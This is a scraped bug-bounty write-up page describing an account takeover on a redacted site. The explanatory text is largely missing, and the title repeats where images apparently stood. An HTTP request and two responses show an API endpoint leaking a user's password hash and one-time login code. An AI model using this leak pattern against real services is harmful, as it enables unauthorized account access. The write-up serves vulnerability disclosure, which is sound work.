InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

Interesting Account Takeover Bugs

protonsec
InfoSec Write-ups
Published in
3 min readNov 5, 2022

Interesting Account Takeover Bug Writeup Bug Bounty Hunting
Interesting Account Takeover Bug Writeup Bug Bounty Hunting
POST /apicallback/webUsers/checkRegistered/ HTTP/2
Host: www.redacted.com
...
...
{
"email":"thisistest123@gmail.com",
"keepLogged":true
}
HTTP/2 200 OK
Date: Fri, 04 Nov 2022 11:00:04 GMT
Content-Type: text/html; charset=UTF-8
...
...
{"error":"0","errorMsg":"email id not registered"}
HTTP/2 200 OK
Date: Fri, 04 Nov 2022 11:04:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 766
...
...
{"entity_id":"714467","entity_type_id":"1","attribute_set_id":"0","website_id":"1","email":"thisistest123@gmail.com","group_id":"1","store_id":"1","created_at":"2022-11-04 08:27:51","updated_at":"2022-11-04 08:27:49","is_active":"1","batch_id":"3","created_in":"Default Store View","password_hash":"482c811da5d5b4bc6d497ffa98491e38","is_subscribe":1,"addresses":[],"menu_data":[{"page_id":3,"title":"ABOUT US"},{"page_id":4,"title":"CONTACT US"},{"page_id":6,"title":"SHIPPING"},{"page_id":7,"title":"RETURNS"},{"page_id":8,"title":"HELP"},{"page_id":9,"title":"TERMS"},{"page_id":10,"title":"PRIVACY"},{"page_id":11,"title":"CAREERS"}],"caching_time":900,"image_caching_time":90000,"Cards":[],"cardsCount":0,"error":"1","errorMsg":"User already exist","otp":938061}
Interesting Account Takeover Bug Writeup Bug Bounty Hunting
Interesting Account Takeover Bug Writeup Bug Bounty Hunting
Interesting Account Takeover Bug Writeup Bug Bounty Hunting
Interesting Account Takeover Bug Writeup Bug Bounty Hunting
Interesting Account Takeover Bug Writeup Bug Bounty Hunting
Interesting Account Takeover Bug Writeup Bug Bounty Hunting

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

No responses yet

Write a response